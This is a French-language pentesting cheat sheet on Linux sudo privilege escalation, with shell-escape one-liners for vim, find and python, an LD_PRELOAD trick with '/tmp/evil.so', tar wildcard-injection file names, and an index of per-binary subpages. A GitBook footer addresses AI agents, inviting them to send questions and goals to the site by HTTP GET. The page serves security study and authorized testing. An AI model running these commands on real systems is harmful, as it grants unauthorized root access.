> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/privesc/sudoers.md).

# Sudoers

L’élévation de privilèges sudoers commence par les commandes qu’un utilisateur peut exécuter via `sudo`. Des binaires mal configurés, des arguments de script non sûrs, la gestion des liens symboliques et des versions vulnérables de sudo peuvent transformer des droits sudo limités en shell root.

## Méthodologie

* Exécutez `sudo -l` et documentez chaque commande autorisée, utilisateur cible et règle NOPASSWD.
* Vérifiez GTFOBins pour les échappements vers un shell, les écritures de fichiers et l’exécution contrôlée par les arguments.
* Examinez les scripts à la recherche de chemins inscriptibles, de la gestion des liens symboliques, de l’expansion des caractères génériques et de références de fichiers manquantes.
* Vérifiez `sudo --version` lorsque le chemin dépend d’une CVE sudo connue.

## Vérifications rapides

```bash
sudo -l
sudo --version
```

## Abus courants de sudo

Lorsque `sudo -l` expose une commande, vérifiez si cette commande peut lancer un shell, écrire des fichiers, suivre des liens symboliques, charger des plugins ou développer des caractères génériques contrôlés par l’attaquant.

```bash
sudo -i
sudo vim -c '!sh'
sudo find . -exec /bin/sh \; -quit
sudo python -c 'import os; os.system("/bin/sh")'
```

### Conservation des variables d’environnement

Si `env_keep` préserve les variables du chargeur, `LD_PRELOAD` ou `LD_LIBRARY_PATH` peut devenir utile. Confirmez d’abord la règle sudoers :

```bash
sudo -l
sudo LD_PRELOAD=/tmp/evil.so program
```

### Exploitation des caractères génériques

L’abus des caractères génériques apparaît lorsqu’une règle sudo exécute une commande sur des noms de fichiers contrôlés par l’attaquant, par exemple des tâches de sauvegarde utilisant `*.conf` ou des archives utilisant `*`.

```bash
echo 'command' > exploit.conf
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'
sudo /usr/bin/rsync *.conf /backup/
```

<table data-view="cards" data-full-width="false" data-search="false"><thead><tr><th></th><th></th><th></th><th data-hidden data-card-target data-type="content-ref"></th></tr></thead><tbody><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo awk</h4></td><td>Notes sudo (awk) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/a1e2adc79a2b26ef43f7ae508732b16b7f54b919">/pages/a1e2adc79a2b26ef43f7ae508732b16b7f54b919</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo Nmap</h4></td><td>Notes sudo (Nmap) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/cecc775427ccc1629d4cbcafd909961578788429">/pages/cecc775427ccc1629d4cbcafd909961578788429</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo Perl</h4></td><td>Notes sudo (Perl) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/67d69e0628bf8564076f9d9dbf256c8cdaefc417">/pages/67d69e0628bf8564076f9d9dbf256c8cdaefc417</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo GitPython</h4></td><td>Notes sudo (GitPython) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/0b66cd3bc9ae978dfed68873074b086ddb9e753e">/pages/0b66cd3bc9ae978dfed68873074b086ddb9e753e</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>CVE des versions de sudo</h4></td><td>Notes sur les vulnérabilités des versions de sudo pour l’élévation de privilèges sous Linux, concernant CVE-2019-14287 et CVE-2025-32463.</td><td><a href="/pages/c0bfbfa75709b81db8d01a30959b605172a7ae9e">/pages/c0bfbfa75709b81db8d01a30959b605172a7ae9e</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo su</h4></td><td>Notes sudo (su) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/258a16bbdc62daca74790a2ae3b9949de83af986">/pages/258a16bbdc62daca74790a2ae3b9949de83af986</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo Knife</h4></td><td>Notes sudo (Knife) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/cf24ffdfb62772dc23b9047dd9c4bce44f6f26e4">/pages/cf24ffdfb62772dc23b9047dd9c4bce44f6f26e4</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo ALL:ALL</h4></td><td>Notes sudo (ALL:ALL) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/7aa0281bcc20dc8f3867add2f4b3b3898a74b000">/pages/7aa0281bcc20dc8f3867add2f4b3b3898a74b000</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo mosh-server</h4></td><td>Notes sudo (Mosh-Server) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/770acc55d4df73b42bcd7dcaa9734983265365fb">/pages/770acc55d4df73b42bcd7dcaa9734983265365fb</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo iptables</h4></td><td>Notes sudo (iptables) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/c8c3dce43d01de1ac5ff76f5a567912753af1d35">/pages/c8c3dce43d01de1ac5ff76f5a567912753af1d35</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo Go</h4></td><td>Notes sudo (Go) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/c4b4b70d743e72e7e8a54eb0aa4b2a06706763c2">/pages/c4b4b70d743e72e7e8a54eb0aa4b2a06706763c2</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo journalctl</h4></td><td>Notes sudo (journalctl) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/0de1b2a5d7b0828f51b75f12ca2bd2be9228b437">/pages/0de1b2a5d7b0828f51b75f12ca2bd2be9228b437</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo Metasploit</h4></td><td>Notes sudo (Metasploit) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/ca810df1e7cf56c5ac78e7df74dc50f118199fb1">/pages/ca810df1e7cf56c5ac78e7df74dc50f118199fb1</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo fichier introuvable</h4></td><td>Notes sudo (fichier introuvable) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/ca890b8327067e0255d85ccd5e661741fa2ff226">/pages/ca890b8327067e0255d85ccd5e661741fa2ff226</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo binaire bee</h4></td><td>Notes sudo (binaire bee) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/cfa644d27627d274dffadd666c61c6b0b8753108">/pages/cfa644d27627d274dffadd666c61c6b0b8753108</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo binaire bbot</h4></td><td>Notes sudo (binaire bbot) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/147540d63912d5acd5e9ce648d4db6da39bca823">/pages/147540d63912d5acd5e9ce648d4db6da39bca823</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Abus de liens symboliques ACL sudo</h4></td><td>Notes sudo ACL / lien symbolique pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/339f227839109882c10ae75f9f4a1e4e0f4cfc10">/pages/339f227839109882c10ae75f9f4a1e4e0f4cfc10</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Double lien symbolique sudo</h4></td><td>Notes sudo (double lien symbolique) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/23b678313455a066bc6b87169906ae02f8009a1e">/pages/23b678313455a066bc6b87169906ae02f8009a1e</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Lien symbolique du binaire de sauvegarde sudo</h4></td><td>Notes sudo (binaire de sauvegarde / lien symbolique) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/41ae6b0de0f1dfc37c20044851d52b4c2fe15867">/pages/41ae6b0de0f1dfc37c20044851d52b4c2fe15867</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Script backy.sh sudo</h4></td><td>Notes sudo - backy.sh (script) pour l’élévation de privilèges sous Linux, avec étapes d’énumération, exemples d’exploitation et validation axée sur le reporting.</td><td><a href="/pages/ec9361089a3e89919f09b1e28fb8a60784df776f">/pages/ec9361089a3e89919f09b1e28fb8a60784df776f</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/privesc/sudoers.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
